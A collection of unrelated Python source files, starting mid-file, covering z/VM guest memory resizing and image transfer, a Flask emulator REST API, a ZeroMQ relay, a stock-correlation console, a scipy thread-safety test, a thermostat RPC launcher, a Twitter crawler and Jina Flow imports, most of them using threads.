"SMT error: %s." % (userid, err1.format_message()))
LOG.error(msg)
LOG.debug("Unlocking the user directory.")
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
else:
LOG.debug("Guest '%s' unlocked successfully." % userid)
# at the end, raise the replace error for upper layer to handle
raise err1
finally:
self._pathutils.clean_temp_folder(tmp_folder)
def _lock_user_direct(self, userid):
rd = ("SMAPI %s API Image_Lock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as e:
# ignore the "already locked" error
if ((e.results['rc'] == 400) and (e.results['rs'] == 12)):
LOG.debug("Image is already unlocked.")
else:
msg = ("Lock definition of guest '%s' failed with"
" SMT error: %s" % (userid, e.format_message()))
LOG.error(msg)
raise e
def resize_memory(self, userid, memory):
# Check defined storage in user entry.
# Update STORAGE and RESERVED accordingly.
size = int(zvmutils.convert_to_mb(memory))
(defined_mem, max_mem, reserved_mem,
user_direct) = self._get_defined_memory(userid)
# Check max memory is properly defined
if max_mem == -1 or reserved_mem == -1:
LOG.error("Memory resize for guest '%s' cann't be done."
"Failed to get the defined/max/reserved memory size "
"from user directory." % userid)
raise exception.SDKConflictError(modID='guest', rs=19,
userid=userid)
action = 0
# Make sure requested size is less than the maximum memory size
if size > max_mem:
LOG.error("Memory resize for guest '%s' cann't be done. The "
"requested memory size: '%im' exceeds the maximum "
"size allowed: '%im'." %
(userid, size, max_mem))
raise exception.SDKConflictError(modID='guest', rs=20,
userid=userid,
req=size, max=max_mem)
# check if already satisfy request
if defined_mem == size:
LOG.info("The current defined memory size in user '%s' equals "
"to requested size: %im, no action for memory resize "
"needed." % (userid, size))
return (action, defined_mem, max_mem, user_direct)
else:
# set action to 1 to represent that revert need to be done when
# live resize failed.
action = 1
# get the new reserved memory size
new_reserved = max_mem - size
# get maximum reserved memory value
MAX_STOR_RESERVED = int(zvmutils.convert_to_mb(
CONF.zvm.user_default_max_reserved_memory))
# when new reserved memory value > the MAX_STOR_RESERVED,
# make is as the MAX_STOR_RESERVED value
if new_reserved > MAX_STOR_RESERVED:
new_reserved = MAX_STOR_RESERVED
# prepare the new user entry content
entry_str = ""
for ent in user_direct:
if ent == '':
# Avoid adding an empty line in the entry file
# otherwise Image_Replace_DM would return syntax error.
continue
new_ent = ""
if ent.startswith("USER "):
fields = ent.split(' ')
for i in range(len(fields)):
# update fields[3] to new defined size
if i != 3:
new_ent += (fields[i] + ' ')
else:
new_ent += (str(size) + 'M ')
# remove the last space
new_ent = new_ent.strip()
elif ent.startswith("COMMAND DEF STOR RESERVED"):
new_ent = ("COMMAND DEF STOR RESERVED %iM" % new_reserved)
else:
new_ent = ent
# append this new entry
entry_str += (new_ent + '\n')
# Lock and replace user definition with the new_entry content
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
LOG.debug("User directory Locked successfully for guest '%s' " %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, entry_str)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
# Finally return useful info
return (action, defined_mem, max_mem, user_direct)
def _revert_user_direct(self, userid, user_entry):
# user_entry can be a list or a string
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed:
# print revert error and return
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory Locked successfully for guest '%s'." %
userid)
# Replace user directory
try:
self._replace_user_direct(userid, user_entry)
except exception.SDKSMTRequestFailed:
msg = ("Failed to revert user direct of guest '%s'." % userid)
LOG.error(msg)
return
LOG.debug("User directory reverted successfully for guest '%s'." %
userid)
def _get_active_memory(self, userid):
# Return an integer value representing the active memory size in mb
output = self.execute_cmd(userid, "lsmem")
active_mem = 0
for e in output:
# cmd output contains line starts with "Total online memory",
# its format can be like:
# "Total online memory : 8192 MB"
# or
# "Total online memory: 8G"
# need handle both formats
if e.startswith("Total online memory"):
try:
# sample mem_info_str: "8192MB" or "8G"
mem_info_str = e.split(':')[1].replace(' ', '').upper()
# make mem_info as "8192M" or "8G"
if mem_info_str.endswith('B'):
mem_info = mem_info_str[:-1]
else:
mem_info = mem_info_str
active_mem = int(zvmutils.convert_to_mb(mem_info))
except (IndexError, ValueError, KeyError, TypeError) as e:
errmsg = ("Failed to get active storage size for guest: %s"
% userid)
LOG.error(errmsg + " with error: " + six.text_type(e))
raise exception.SDKInternalError(msg=errmsg)
break
return active_mem
def live_resize_memory(self, userid, memory):
# Get active memory size and compare with requested size
# If request size is smaller than the current size, then report
# error and exit immediately.
size = int(zvmutils.convert_to_mb(memory))
active_size = self._get_active_memory(userid)
if active_size > size:
LOG.error("Failed to live resize memory of guest: %(uid)s, "
"current active memory size: %(cur)im is greater than "
"the requested size: %(req)im." %
{'uid': userid, 'cur': active_size,
'req': size})
raise exception.SDKConflictError(modID='guest', rs=18,
userid=userid,
active=active_size,
req=size)
# get maximum reserved memory value
MAX_STOR_RESERVED = int(zvmutils.convert_to_mb(
CONF.zvm.user_default_max_reserved_memory))
# The maximum increased memory size in one live resizing can't
# exceed MAX_STOR_RESERVED
increase_size = size - active_size
if increase_size > MAX_STOR_RESERVED:
LOG.error("Live memory resize for guest '%s' cann't be done. "
"The memory size to be increased: '%im' is greater "
" than the maximum reserved memory size: '%im'." %
(userid, increase_size, MAX_STOR_RESERVED))
raise exception.SDKConflictError(modID='guest', rs=21,
userid=userid,
inc=increase_size,
max=MAX_STOR_RESERVED)
# Static resize memory. (increase/decrease memory from user directory)
(action, defined_mem, max_mem,
user_direct) = self.resize_memory(userid, memory)
# Compare active size and requested size, then update accordingly
if active_size == size:
# online memory already satisfied
LOG.info("Current active memory size of guest: '%s' equals to the "
"requested size: '%iM', no more actions needed for "
"live resize." % (userid, size))
LOG.info("Live resize memory for guest: '%s' finished "
"successfully." % userid)
return
else:
# Do live resize. update memory size
# Step1: Define new standby storage
cmd_str = ("vmcp def storage standby %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as e:
# rollback and return
msg = ("Define standby memory of guest: '%s' failed with "
"error: %s." % (userid, e.format_message()))
LOG.error(msg)
# Start to do rollback
if action == 1:
LOG.debug("Start to revert user definition of guest '%s'."
% userid)
self._revert_user_direct(userid, user_direct)
# Finally, raise the error and exit
raise exception.SDKGuestOperationError(rs=11,
userid=userid,
err=e.format_message())
# Step 2: Online new memory
cmd_str = ("chmem -e %sM" % increase_size)
try:
self.execute_cmd(userid, cmd_str)
except exception.SDKSMTRequestFailed as err1:
# rollback and return
msg1 = ("Online memory of guest: '%s' failed with "
"error: %s." % (userid, err1.format_message()))
LOG.error(msg1)
# Start to do rollback
LOG.info("Start to do revert.")
LOG.debug("Reverting the standby memory.")
try:
self.execute_cmd(userid, "vmcp def storage standby 0M")
except exception.SDKSMTRequestFailed as err2:
# print revert error info and continue
msg2 = ("Revert standby memory of guest: '%s' failed with "
"error: %s." % (userid, err2.format_message()))
LOG.error(msg2)
# Continue to do the user directory change.
if action == 1:
LOG.debug("Reverting the user directory change of guest "
"'%s'." % userid)
self._revert_user_direct(userid, user_direct)
# Finally raise the exception
raise exception.SDKGuestOperationError(
rs=7, userid=userid, err=err1.format_message())
LOG.info("Live resize memory for guest: '%s' finished successfully."
% userid)
def is_rhcos(self, os_version):
return os_version.lower().startswith('rhcos')
def _get_wwpn_lun(self, userid):
user_direct = self.get_user_direct(userid)
wwpn = None
lun = None
for ent in user_direct:
if ent.upper().startswith("LOADDEV PORT"):
wwpn = ent.split()[2].strip()
elif ent.upper().startswith("LOADDEV LUN"):
lun = ent.split()[2].strip()
return (wwpn, lun)
class FilesystemBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
"""Import image from remote host to local image repository using scp.
If remote_host not specified, it means the source file exist in local
file system, just copy the image to image repository
"""
source = urlparse.urlparse(url).path
if kwargs['remote_host']:
if '@' in kwargs['remote_host']:
source_path = ':'.join([kwargs['remote_host'], source])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Copying image file from remote filesystem failed"
" with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=10, err=output)
else:
msg = ("The specified remote_host %s format invalid" %
kwargs['remote_host'])
LOG.error(msg)
raise exception.SDKImageOperationError(rs=11,
rh=kwargs['remote_host'])
else:
LOG.debug("Remote_host not specified, will copy from local")
try:
shutil.copyfile(source, target)
except Exception as err:
msg = ("Import image from local file system failed"
" with reason %s" % six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=12,
err=six.text_type(err))
@classmethod
def image_export(cls, source_path, dest_url, **kwargs):
"""Export the specific image to remote host or local file system """
dest_path = urlparse.urlparse(dest_url).path
if kwargs['remote_host']:
target_path = ':'.join([kwargs['remote_host'], dest_path])
command = ' '.join(['/usr/bin/scp',
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
'-r ', source_path, target_path])
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when copying image file to remote "
"host with reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=21, msg=output)
else:
# Copy to local file system
LOG.debug("Remote_host not specified, will copy to local server")
try:
shutil.copyfile(source_path, dest_path)
except Exception as err:
msg = ("Export image from %(src)s to local file system"
" %(dest)s failed: %(err)s" %
{'src': source_path,
'dest': dest_path,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=22,
err=six.text_type(err))
class HTTPBackend(object):
@classmethod
def image_import(cls, image_name, url, target, **kwargs):
import_image = MultiThreadDownloader(image_name, url,
target)
import_image.run()
class MultiThreadDownloader(threading.Thread):
def __init__(self, image_name, url, target):
super(MultiThreadDownloader, self).__init__()
self.url = url
# Set thread number
self.threadnum = 8
r = requests.head(self.url)
# Get the size of the download resource
self.totalsize = int(r.headers['Content-Length'])
self.target = target
def handle_download_errors(func):
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as err:
self.fd.close()
msg = ("Download image from http server failed: %s" %
six.text_type(err))
LOG.error(msg)
raise exception.SDKImageOperationError(rs=9,
err=six.text_type(err))
return wrapper
def get_range(self):
ranges = []
offset = int(self.totalsize / self.threadnum)
for i in range(self.threadnum):
if i == self.threadnum - 1:
ranges.append((i * offset, ''))
else:
# Get the process range for each thread
ranges.append((i * offset, (i + 1) * offset))
return ranges
def download(self, start, end):
headers = {'Range': 'Bytes=%s-%s' % (start, end),
'Accept-Encoding': '*'}
# Get the data
res = requests.get(self.url, headers=headers)
# seek to the right position for writing data
LOG.debug("Downloading file range %s:%s success" % (start, end))
with _LOCK:
self.fd.seek(start)
self.fd.write(res.content)
@handle_download_errors
def run(self):
self.fd = open(self.target, 'w')
thread_list = []
n = 0
for ran in self.get_range():
start, end = ran
LOG.debug('thread %d start:%s,end:%s' % (n, start, end))
n += 1
# Open thread
thread = threading.Thread(target=self.download, args=(start, end))
thread.start()
thread_list.append(thread)
for i in thread_list:
i.join()
LOG.info('Download %s success' % (self.name))
self.fd.close()
|
rest_api_endpoint.py
|
# Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
import logging
import threading
from flask import Flask, send_from_directory
from flask_restful import Api
from gevent.pywsgi import WSGIServer
# need to import total module to set its global variable dcs
from emuvim.api.rest import compute
from emuvim.api.rest.compute import ComputeList, Compute, ComputeResources, DatacenterList, DatacenterStatus
# need to import total module to set its global variable net
from emuvim.api.rest import network
from emuvim.api.rest.network import NetworkAction, DrawD3jsgraph
from emuvim.api.rest import monitor
from emuvim.api.rest.monitor import MonitorInterfaceAction, MonitorFlowAction, MonitorLinkAction, MonitorSkewAction, MonitorTerminal
import pkg_resources
from os import path
logging.basicConfig()
class RestApiEndpoint(object):
"""
Simple API endpoint that offers a REST
interface. This interface will be used by the
default command line client.
"""
def __init__(self, listenip, port, DCnetwork=None):
self.ip = listenip
self.port = port
# connect this DC network to the rest api endpoint (needed for the
# networking and monitoring api)
self.connectDCNetwork(DCnetwork)
# setup Flask
self.app = Flask(__name__)
self.api = Api(self.app)
# define dashboard endpoints
db_dir, db_file = self.get_dashboard_path()
@self.app.route('/dashboard/<path:path>')
def db_file(path):
logging.info("[DB] Serving: {}".format(path))
return send_from_directory(db_dir, path)
# define REST API endpoints
# compute related actions (start/stop VNFs, get info)
self.api.add_resource(
Compute, "/restapi/compute/<dc_label>/<compute_name>")
self.api.add_resource(ComputeList,
"/restapi/compute",
"/restapi/compute/<dc_label>")
self.api.add_resource(
ComputeResources, "/restapi/compute/resources/<dc_label>/<compute_name>")
self.api.add_resource(
DatacenterStatus, "/restapi/datacenter/<dc_label>")
self.api.add_resource(DatacenterList, "/restapi/datacenter")
# network related actions (setup chaining between VNFs)
self.api.add_resource(NetworkAction,
"/restapi/network")
self.api.add_resource(DrawD3jsgraph,
"/restapi/network/d3jsgraph")
# monitoring related actions
# export a network interface traffic rate counter
self.api.add_resource(MonitorInterfaceAction,
"/restapi/monitor/interface")
# export flow traffic counter, of a manually pre-installed flow entry,
# specified by its cookie
self.api.add_resource(MonitorFlowAction,
"/restapi/monitor/flow")
# install monitoring of a specific flow on a pre-existing link in the service.
# the traffic counters of the newly installed monitor flow are exported
self.api.add_resource(MonitorLinkAction,
"/restapi/monitor/link")
# install skewness monitor of resource usage disribution
# the skewness metric is exported
self.api.add_resource(MonitorSkewAction,
"/restapi/monitor/skewness")
# start a terminal window for the specified vnfs
self.api.add_resource(MonitorTerminal,
"/restapi/monitor/term")
logging.debug("Created API endpoint %s(%s:%d)" %
(self.__class__.__name__, self.ip, self.port))
def get_dashboard_path(self):
"""
Return absolute path to dashboard files.
"""
db_file = pkg_resources.resource_filename(
'emuvim.dashboard', "index.html")
db_dir = path.dirname(db_file)
logging.info("[DB] Serving emulator dashboard from: {} and {}"
.format(db_dir, db_file))
return db_dir, db_file
def connectDatacenter(self, dc):
compute.dcs[dc.label] = dc
logging.info(
"Connected DC(%s) to API endpoint %s(%s:%d)" % (dc.label, self.__class__.__name__, self.ip, self.port))
def connectDCNetwork(self, DCnetwork):
network.net = DCnetwork
monitor.net = DCnetwork
logging.info("Connected DCNetwork to API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def start(self):
self.thread = threading.Thread(target=self._start_flask, args=())
self.thread.daemon = True
self.thread.start()
logging.info("Started API endpoint @ http://%s:%d" %
(self.ip, self.port))
def stop(self):
if self.http_server:
self.http_server.close()
def _start_flask(self):
# self.app.run(self.ip, self.port, debug=False, use_reloader=False)
# this should be a more production-fit http-server
# self.app.logger.setLevel(logging.ERROR)
self.http_server = WSGIServer((self.ip, self.port),
self.app,
# This disables HTTP request logs to not
# mess up the CLI when e.g. the
# auto-updated dashboard is used
log=open("/dev/null", "w")
)
self.http_server.serve_forever()
|
mtrelay.py
|
"""
Multithreaded relay
Author: Guillaume Aubert (gaubert) <guillaume(dot)aubert(at)gmail(dot)com>
"""
import threading
import zmq
def step1(context):
""" step1 """
# Signal downstream to step 2
sender = context.socket(zmq.PAIR)
sender.connect("inproc://step2")
sender.send("")
def step2(context):
""" step2 """
# Bind to inproc: endpoint, then start upstream thread
receiver = context.socket(zmq.PAIR)
receiver.bind("inproc://step2")
thread = threading.Thread(target=step1, args=(context, ))
thread.start()
# Wait for signal
string = receiver.recv()
# Signal downstream to step 3
sender = context.socket(zmq.PAIR)
sender.connect("inproc://step3")
sender.send("")
return
def main():
""" server routine """
# Prepare our context and sockets
context = zmq.Context(1)
# Bind to inproc: endpoint, then start upstream thread
receiver = context.socket(zmq.PAIR)
receiver.bind("inproc://step3")
thread = threading.Thread(target=step2, args=(context, ))
thread.start()
# Wait for signal
string = receiver.recv()
print("Test successful!\n")
receiver.close()
context.term()
return
if __name__ == "__main__":
main()
|
console_coorelate.py
|
import time
import threading
import logging
import data as d
from analysis.correlate import Correlate
from data import store as store
from utils import ui
_logger = ui.get_logger(logging.WARNING, logfile='')
class Interface:
def __init__(self, coor: str = ''):
self.list = coor.upper()
self.coorelate: Correlate = None
self.exchanges = [e['abbreviation'] for e in d.EXCHANGES]
self.indexes = [i['abbreviation'] for i in d.INDEXES]
self.tickers: list[str] = []
if not coor:
self.main_menu()
elif store.is_list(self.list):
self.main_menu(selection=1)
else:
ui.print_error('Invalid list specified')
def main_menu(self, selection=0):
while True:
menu_items = {
'1': 'Compute Coorelation',
'2': 'Best Coorelation',
'3': 'Least Coorelation',
'4': 'ticker Coorelation',
'0': 'Exit'
}
if selection == 0:
selection = ui.menu(menu_items, 'Select Operation', 0, len(menu_items)-1)
if selection == 1:
self.compute_coorelation()
elif selection == 2:
self.get_best_coorelation()
elif selection == 3:
self.get_least_coorelation()
elif selection == 4:
self.get_ticker_coorelation()
elif selection == 0:
break
selection = 0
def compute_coorelation(self, progressbar=True):
if not self.list:
self.list = self._get_list()
if self.list:
self.tickers = store.get_tickers(self.list)
self.coorelate = Correlate(self.tickers)
self.task = threading.Thread(target=self.coorelate.compute_correlation)
self.task.start()
if progressbar:
print()
self._show_progress('Progress', '')
ui.print_message(f'Coorelation Among {self.list} Symbols')
print(self.coorelate.correlation)
def get_best_coorelation(self):
if not self.coorelate:
ui.print_error('Run coorelation first')
elif not self.coorelate:
ui.print_error('Run coorelation first')
else:
ui.print_message(f'Best Coorelations in {self.list}')
best = self.coorelate.get_sorted_coorelations(20, True)
for item in best:
print(f'{item[0]}/{item[1]:<5}\t{item[2]:.4f}')
def get_least_coorelation(self):
if not self.coorelate:
ui.print_error('Run coorelation first')
elif not self.coorelate:
ui.print_error('Run coorelation first')
else:
ui.print_message(f'Least Coorelations in {self.list}')
best = self.coorelate.get_sorted_coorelations(20, False)
for item in best:
print(f'{item[0]}/{item[1]:<5}\t{item[2]:.4f}')
def get_ticker_coorelation(self):
if not self.coorelate:
ui.print_error('Run coorelation first')
elif not self.coorelate:
ui.print_error('Run coorelation first')
else:
ticker = ui.input_text('Enter symbol: ').upper()
if not store.is_ticker(ticker):
ui.print_error('Invalid symbol')
else:
df = self.coorelate.get_ticker_coorelation(ticker)
ui.print_message(f'Highest correlations to {ticker}')
for sym, val in df[-1:-11:-1].iteritems():
print(f'{sym:>5}: {val:.5f}')
ui.print_message(f'Lowest correlations to {ticker}')
for sym, val in df[:10].iteritems():
print(f'{sym:>5}: {val:.5f}')
def _get_list(self):
list = ''
menu_items = {}
for i, exchange in enumerate(self.exchanges):
menu_items[f'{i+1}'] = f'{exchange}'
for i, index in enumerate(self.indexes, i):
menu_items[f'{i+1}'] = f'{index}'
menu_items['0'] = 'Cancel'
select = ui.menu(menu_items, 'Select exchange, or 0 to cancel: ', 0, i+1)
if select > 0:
list = menu_items[f'{select}']
return list
def _show_progress(self, prefix, suffix):
while not self.coorelate.task_error:
pass
if self.coorelate.task_error == 'None':
total = self.coorelate.task_total
ui.progress_bar(self.coorelate.task_completed, self.coorelate.task_total, prefix=prefix, suffix=suffix, reset=True)
while self.task.is_alive and self.coorelate.task_error == 'None':
time.sleep(0.20)
completed = self.coorelate.task_completed
ticker = self.coorelate.task_ticker
ui.progress_bar(completed, total, prefix=prefix, suffix=suffix, ticker=ticker)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Analysis')
parser.add_argument('-c', '--coorelate', help='Coorelate the list')
command = vars(parser.parse_args())
if command['coorelate']:
Interface(coor=command['coorelate'])
else:
Interface()
|
test__threadsafety.py
|
from __future__ import division, print_function, absolute_import
import threading
import time
import traceback
from numpy.testing import assert_
from pytest import raises as assert_raises
from scipy._lib._threadsafety import ReentrancyLock, non_reentrant, ReentrancyError
def test_parallel_threads():
# Check that ReentrancyLock serializes work in parallel threads.
#
# The test is not fully deterministic, and may succeed falsely if
# the timings go wrong.
lock = ReentrancyLock("failure")
failflag = [False]
exceptions_raised = []
def worker(k):
try:
with lock:
assert_(not failflag[0])
failflag[0] = True
time.sleep(0.1 * k)
assert_(failflag[0])
failflag[0] = False
except Exception:
exceptions_raised.append(traceback.format_exc(2))
threads = [threading.Thread(target=lambda k=k: worker(k))
for k in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
exceptions_raised = "\n".join(exceptions_raised)
assert_(not exceptions_raised, exceptions_raised)
def test_reentering():
# Check that ReentrancyLock prevents re-entering from the same thread.
@non_reentrant()
def func(x):
return func(x)
assert_raises(ReentrancyError, func, 0)
|
thermostat_with_json_rpc_server.py
|
#pylint: disable=wrong-import-position, invalid-name
import threading
import asyncio
import sys
import os
from pathlib import PurePath
sys.path.append(os.getcwd())
from chili_pad_with_thermostat.thermostat import Thermostat
from chili_pad_with_thermostat.temp_program import TempProgram
from chili_pad_with_thermostat.json_rpc_server import JsonRpcServer
from chili_pad_with_thermostat.thermostat_rpc_handler import ThermostatRpcHandler
temp_program = TempProgram(str(PurePath(os.getcwd(), 'data/temp_profile.yml')))
thermostat = Thermostat(temp_program=temp_program)
thermostat_rpc_handler = ThermostatRpcHandler(thermostat)
JsonRpcServer.set_rpc_handler(thermostat_rpc_handler.handle_command)
srv = threading.Thread(target=JsonRpcServer.run_server)
srv.start()
asyncio.run(thermostat.run())
|
rest_crawler.py
|
# -*- coding=utf-8 -*-
# author: Chi-zhan Zhang
# date:2019/7/27
# func: twitter spider demo
import json
import os
import shutil
import requests
import time
import threading
import datetime
from id_collection import create_api, create_user_agent
class TwitterCrawler(object):
def __init__(self, since_id=None, clean_dir=False):
# TODO: change the proxy value by your own proxy
self.proxy = ''
# TODO: change the QUERY value by your own QUERY
self.QUERY = '#Bitcoin OR #BTC'
self.result_text_dir = './temp_data'
self.picture_dir = './pictures'
self.all_result_file = os.path.join(self.result_text_dir, 'all_result.json')
self.tweets_with_picture_file = os.path.join(self.result_text_dir, 'tweets_with_picture.json')
self.updating_all_result_file = os.path.join(self.result_text_dir, 'updating_all_result.json')
self.picture_downloaded_error_file = os.path.join(self.result_text_dir, 'picture_download_error_tweets.json')
self.log_path = './log.txt'
self.MAX_TWEETS = 1000
self.COUNT_PER_QUERY = 100
self.tweet_downloaded_count = 0
self.tweet_refined_count = 0
self.api = create_api(proxy=self.proxy)
self.since_id = since_id
"""Thread setting"""
self.lock = threading.RLock()
self.MAX_THREADS = 10
self.working_threads = 0
self.finished_threads = 0
"""Dir initialization"""
if clean_dir:
self._clean_dir()
if not os.path.isdir(self.picture_dir):
os.mkdir(self.picture_dir)
if not os.path.isdir(self.result_text_dir):
os.mkdir(self.result_text_dir)
"""Update status, if since_id is not None, it is considered updating status"""
if since_id:
if os.path.isfile(self.updating_all_result_file):
os.remove(self.updating_all_result_file)
self.all_result_file = self.updating_all_result_file
def _clean_dir(self):
""" func: remove tem_data dir and picture dir"""
if os.path.isdir(self.picture_dir):
shutil.rmtree(self.picture_dir)
if os.path.isdir(self.result_text_dir):
shutil.rmtree(self.result_text_dir)
self.log_info("Successfully cleaned temp_data dir and picture dir!")
def _save_all_result(self, search_results):
""" func: save all results of one api.search()
:arg search_results is the return of api.search()
"""
with open(self.all_result_file, 'a', encoding='utf8') as f:
for i, one_tweet in enumerate(search_results):
json.dump(one_tweet._json, f, ensure_ascii=False)
f.write('\n')
self.tweet_downloaded_count += len(search_results)
self.log_info('Total downloaded {:^6d} tweets'.format(self.tweet_downloaded_count))
def _download_picture(self, url, picture_id, picture_dir):
""" func: download a picture of a tweet
arg: url is the picture link
picture_id is the tweet id
picture_dir is the dir storing all of the downloaded pictures
return: if picture is successfully downloaded, return True; else, return False
"""
proxies = {'http': self.proxy, 'https': self.proxy}
filename = os.path.join(picture_dir, str(picture_id) + url[-4:])
try:
r = requests.get(url, headers={'User-Agent': create_user_agent()}, proxies=proxies)
r.raise_for_status()
with open(filename, 'wb') as f:
f.write(r.content)
return True
except:
self.log_info("Download picture wrong: %s" % url)
return False
def _save_one_refined_tweet(self, tweet):
""" func: Save the id, full_text and picture_url of one tweet having at least one picture
:arg: tweet is the information of one tweet, a json dictionary
"""
tweet_saved_dict = {}
tweet_saved_dict['id'] = tweet['id']
tweet_saved_dict['text'] = tweet['full_text']
# type = tweet['extended_entities']['media']['type']
# if type == "video":
tweet_saved_dict['media_url'] = tweet['extended_entities']['media'][0]['media_url_https']
try:
if self._download_picture(tweet_saved_dict['media_url'], tweet_saved_dict['id'], self.picture_dir):
with self.lock:
with open(self.tweets_with_picture_file, 'a', encoding='utf8') as f:
json.dump(tweet_saved_dict, f, ensure_ascii=False)
f.write('\n')
self.tweet_refined_count += 1
self.finished_threads += 1
self.working_threads -= 1
else:
with open(self.picture_downloaded_error_file, 'a', encoding='utf8') as ef:
json.dump(tweet_saved_dict, ef, ensure_ascii=False)
ef.write('\n')
except Exception as e:
self.log_info("Some error: %s" % str(e))
def _refine_results(self):
""" func: Extract all tweets having at least one picture, save their full_text and download pictures"""
self.log_info("Start extracting tweets having at least one picture...")
refined_tweets = []
if not os.path.isfile(self.all_result_file):
self.log_info("No such a file: %s" % self.all_result_file)
return
with open(self.all_result_file, 'r', encoding='utf8') as f:
for line in f.readlines():
tweet_dict = json.loads(line.rstrip())
try:
if tweet_dict['full_text']:
if tweet_dict['extended_entities']['media'][0]['media_url_https']:
refined_tweets.append(tweet_dict)
except:
pass
total_tweets = len(refined_tweets)
for tweet in refined_tweets:
if self.working_threads < self.MAX_THREADS:
t = threading.Thread(target=self._save_one_refined_tweet, args=(tweet,))
t.start()
self.working_threads += 1
self.log_info("Working threads: {:<2d} | Maximum threads: {:<2d} "
"| Finished tweets: {:<5d} | Total tweets: {:<5d}".format(
self.working_threads, self.MAX_THREADS, self.finished_threads, total_tweets))
time.sleep(0.2)
self.log_info("Successfully refined and saved %d tweets" % self.tweet_refined_count)
def log_info(self, string):
t = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
string = t + "\t" + string
with open(self.log_path, 'a', encoding='utf8') as f:
f.write(string + '\n')
print(string)
def run(self):
max_tweet_id = -1
self.log_info("Search key words: %s | Max searched tweets: %d" % (self.QUERY, self.MAX_TWEETS))
if self.since_id:
self.log_info("Start updating tweets since id: {:}...".format(self.since_id))
else:
self.log_info("Start downloading tweets...")
while self.tweet_downloaded_count < self.MAX_TWEETS:
try:
if max_tweet_id <= 0:
if not self.since_id:
new_tweets = self.api.search(q=self.QUERY,
tweet_mode='extended',
count=self.COUNT_PER_QUERY,
)
else:
new_tweets = self.api.search(q=self.QUERY,
tweet_mode='extended',
count=self.COUNT_PER_QUERY,
since_id=self.since_id,
)
else:
if not self.since_id:
new_tweets = self.api.search(q=self.QUERY,
tweet_mode='extended',
count=self.COUNT_PER_QUERY,
max_id=str(max_tweet_id - 1),
)
else:
new_tweets = self.api.search(q=self.QUERY,
tweet_mode='extended',
count=self.COUNT_PER_QUERY,
since_id=self.since_id,
max_id=str(max_tweet_id - 1),
)
if not new_tweets:
self.log_info("No more tweets found!")
break
self._save_all_result(new_tweets)
max_tweet_id = new_tweets[-1].id
earliest_tweet_time = new_tweets[-1].created_at
self.log_info("earliest_tweet_time = %s" % earliest_tweet_time)
except Exception as e:
self.log_info("Some error: " + str(e))
break
self._refine_results()
if __name__ == '__main__':
crawler = TwitterCrawler(clean_dir=True, since_id=None)
crawler.run()
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import Optional, Union, Tuple, List, Set, Dict, overload, Type
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
PollingType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RoutingTableCyclicError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import CompoundPod, Pod
from ..peapods.pods.k8s import K8sPod
from ..peapods.pods.factory import PodFactory
from ..types.routing.table import RoutingTable
from ..peapods.networking import is_remote_local_connection
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
